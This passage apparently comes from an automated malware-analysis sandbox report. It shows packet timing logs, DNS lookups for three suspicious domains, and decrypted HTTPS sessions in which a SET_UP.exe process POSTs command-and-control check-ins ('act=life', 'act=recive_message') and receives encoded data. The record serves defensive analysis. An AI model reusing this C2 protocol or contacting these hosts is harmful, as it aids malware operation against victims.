                                                                                                                                                                                                Jan 5, 2025 18:02:36.215909004 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.215926886 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.215990067 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.215996027 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.216042995 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.216768026 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.216784000 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.216816902 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.216823101 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.216851950 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.216871023 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.217679977 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.217700005 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.217721939 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.217726946 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.217755079 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.217770100 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.219331980 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300210953 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300244093 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300316095 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300335884 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300384998 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300661087 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300683022 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300714970 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300720930 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300750971 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.300765038 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.301455975 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.301474094 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.301517010 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.301522017 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.301546097 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.301564932 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302273035 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302289963 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302347898 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302352905 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302402020 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302402973 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302427053 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302457094 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302475929 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302475929 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302484989 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.302532911 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.303320885 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.303335905 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.303378105 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.303383112 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.303395033 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.303428888 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.303880930 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304151058 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304167032 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304223061 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304228067 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304269075 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304858923 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304876089 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304925919 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304932117 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.304972887 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.313200951 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387634039 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387656927 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387732983 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387747049 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387758017 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387773037 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387783051 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387787104 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387794971 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387819052 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.387851000 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388145924 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388161898 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388200998 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388206959 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388216972 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388247013 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388686895 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388706923 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388736963 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388741016 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388752937 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388767958 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.388792038 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.389653921 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.389672041 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.389736891 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.389744043 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.390256882 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.390279055 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.390305996 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.390311003 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.390330076 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.391177893 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.391197920 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.391242981 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.391248941 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.391273022 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.392976046 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.435825109 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.435853958 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.435970068 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.435992002 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.436007977 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.475564003 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.475590944 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.475687027 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.475694895 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476185083 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476203918 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476268053 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476274967 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476720095 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476747036 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476787090 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476793051 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476826906 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.477243900 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.477257967 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.477319956 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.477327108 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478111982 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478143930 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478163004 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478167057 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478225946 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478878021 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478893042 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478930950 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478936911 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478976011 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.479115009 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.479130983 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.479176044 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.479182005 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.481013060 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.523561001 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.523585081 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.523698092 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.523705959 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562794924 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562820911 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562886953 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562895060 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562928915 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563126087 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563153028 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563190937 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563196898 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563221931 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563913107 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563935041 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563970089 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563975096 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.564003944 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.564023972 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.564028025 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.564073086 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.575357914 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.575376034 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.575391054 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.575395107 CET44349758104.21.37.128192.168.2.4

                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Jan 5, 2025 18:02:18.341510057 CET5046753192.168.2.41.1.1.1
                                                                                                                                                                                                Jan 5, 2025 18:02:18.355395079 CET53504671.1.1.1192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.773715973 CET5391453192.168.2.41.1.1.1
                                                                                                                                                                                                Jan 5, 2025 18:02:28.878102064 CET53539141.1.1.1192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.809875011 CET5958953192.168.2.41.1.1.1
                                                                                                                                                                                                Jan 5, 2025 18:02:29.822504997 CET53595891.1.1.1192.168.2.4

                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Jan 5, 2025 18:02:18.341510057 CET192.168.2.41.1.1.10xbc95Standard query (0)cutefingeuker.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 5, 2025 18:02:28.773715973 CET192.168.2.41.1.1.10xc25bStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 5, 2025 18:02:29.809875011 CET192.168.2.41.1.1.10x1245Standard query (0)klipvumisui.shopA (IP address)IN (0x0001)false

                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Jan 5, 2025 18:02:18.355395079 CET1.1.1.1192.168.2.40xbc95No error (0)cutefingeuker.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 5, 2025 18:02:18.355395079 CET1.1.1.1192.168.2.40xbc95No error (0)cutefingeuker.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 5, 2025 18:02:28.878102064 CET1.1.1.1192.168.2.40xc25bNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 5, 2025 18:02:29.822504997 CET1.1.1.1192.168.2.40x1245No error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 5, 2025 18:02:29.822504997 CET1.1.1.1192.168.2.40x1245No error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false

                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                • cutefingeuker.click
                                                                                                                                                                                                • cegu.shop
                                                                                                                                                                                                • klipvumisui.shop

                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.449748188.114.96.34437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:18 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Host: cutefingeuker.click
                                                                                                                                                                                                2025-01-05 17:02:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                2025-01-05 17:02:19 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:19 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=l7dk6ur4a455net1gm8p1eceh7; expires=Thu, 01 May 2025 10:48:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MER0NFeSXcY9KdogYZYdVBwpw6I%2FJtJy66rGfgWlN8%2BGsit5WulYEvXMxn9O49HYhFoy%2FUu6dMuC2dnlhm8D7aXQquLBL%2BgTJLRoviR9GxaxkneqeNgnPcJ5DLWg6ibGZwXHS%2BCV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd509085df343bc-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1567&rtt_var=607&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1863433&cwnd=221&unsent_bytes=0&cid=f73f6135c7169bd5&ts=763&x=0"
                                                                                                                                                                                                2025-01-05 17:02:19 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                2025-01-05 17:02:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.449750188.114.96.34437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:20 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 80
                                                                                                                                                                                                Host: cutefingeuker.click
                                                                                                                                                                                                2025-01-05 17:02:20 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                                                                                2025-01-05 17:02:20 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:20 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=rguvpdh0gl1pla55bf9qf5i0i2; expires=Thu, 01 May 2025 10:48:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ck50ZijfASBikJBWgRgRAi3S9aAwj8fYDquMBnq9Yv3LzfCK9OA3pKIqM8R0I8TnDPdMPJM1ftMOLvvAUzrjVeOghZN7Oyl1Hu9%2FksCWRfT3uxSI14kHnhP9kfy3hphXTXLOIOgh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd509109d2743b9-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1646&rtt_var=823&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=983&delivery_rate=344624&cwnd=192&unsent_bytes=0&cid=9b220fb7138cd675&ts=770&x=0"
                                                                                                                                                                                                2025-01-05 17:02:20 UTC249INData Raw: 33 61 38 38 0d 0a 39 62 6a 43 36 78 66 51 51 50 4d 75 39 74 38 45 75 6b 33 71 30 2f 38 4b 79 38 48 78 6a 30 51 58 34 32 31 76 44 35 50 70 31 43 2b 4f 6d 72 54 4a 4c 65 52 73 30 56 32 54 2f 54 37 63 4c 49 61 67 6d 69 62 70 6f 4a 57 74 66 6e 47 43 41 52 78 71 76 38 75 69 51 74 65 43 70 49 70 37 6f 79 58 66 44 4a 4f 6e 4a 6f 41 57 6b 66 47 61 5a 4f 6e 37 30 2b 6f 75 64 59 49 42 44 57 37 34 68 71 52 44 6c 74 43 75 6a 48 2b 31 49 35 64 50 6d 72 4a 68 33 79 69 4c 75 5a 46 6a 70 71 6d 63 72 57 67 31 68 68 64 4e 4e 62 47 6b 73 56 75 55 39 61 4f 59 66 50 49 39 33 31 58 55 75 6d 71 59 64 38 69 79 6d 6d 69 6e 70 35 58 6b 4c 48 2b 4c 43 51 78 72 2b 5a 6d 39 53 5a 33 51 6f 49 39 2b 76 79 71 44 51 70 43 31 61 74 6b 69 69 2f 48 54 4b 4b 36 37 30 37 56
                                                                                                                                                                                                Data Ascii: 3a889bjC6xfQQPMu9t8Euk3q0/8Ky8Hxj0QX421vD5Pp1C+OmrTJLeRs0V2T/T7cLIagmibpoJWtfnGCARxqv8uiQteCpIp7oyXfDJOnJoAWkfGaZOn70+oudYIBDW74hqRDltCujH+1I5dPmrJh3yiLuZFjpqmcrWg1hhdNNbGksVuU9aOYfPI931XUumqYd8iymminp5XkLH+LCQxr+Zm9SZ3QoI9+vyqDQpC1atkii/HTKK6707V
                                                                                                                                                                                                2025-01-05 17:02:20 UTC1369INData Raw: 6d 4a 72 4d 4d 48 48 7a 6b 68 71 5a 4c 31 38 58 75 6b 44 57 31 4c 74 45 55 31 4c 56 71 31 69 71 4c 76 70 70 70 71 62 47 63 37 53 56 39 69 51 73 48 59 76 36 45 75 45 65 51 30 71 6d 4f 65 72 55 71 6c 30 4f 58 2f 53 69 59 4b 4a 44 78 78 53 69 4a 73 35 44 75 4d 6e 69 51 54 78 49 6a 36 4d 75 78 51 64 65 43 34 49 39 37 73 79 2b 52 58 70 79 32 62 64 30 39 67 37 69 51 5a 61 6d 75 6d 65 49 6c 64 59 59 46 42 32 4c 37 6a 37 74 41 6b 64 71 67 79 54 76 79 4a 59 6b 4d 7a 50 31 46 33 54 2b 50 76 59 73 71 6b 2b 4f 4d 6f 7a 38 31 68 67 4e 4e 4e 62 47 44 73 30 36 55 30 61 2b 4b 66 62 6b 77 6b 56 36 53 73 47 50 4b 4b 59 32 2f 6c 32 75 37 71 5a 33 72 4a 58 79 4b 42 67 68 71 39 63 76 34 44 5a 44 43 34 4e 45 31 6b 79 2b 61 51 4a 36 71 5a 70 67 77 78 71 6a 64 62 36 58 6a 79 36
                                                                                                                                                                                                Data Ascii: mJrMMHHzkhqZL18XukDW1LtEU1LVq1iqLvpppqbGc7SV9iQsHYv6EuEeQ0qmOerUql0OX/SiYKJDxxSiJs5DuMniQTxIj6MuxQdeC4I97sy+RXpy2bd09g7iQZamumeIldYYFB2L7j7tAkdqgyTvyJYkMzP1F3T+PvYsqk+OMoz81hgNNNbGDs06U0a+KfbkwkV6SsGPKKY2/l2u7qZ3rJXyKBghq9cv4DZDC4NE1ky+aQJ6qZpgwxqjdb6Xjy6
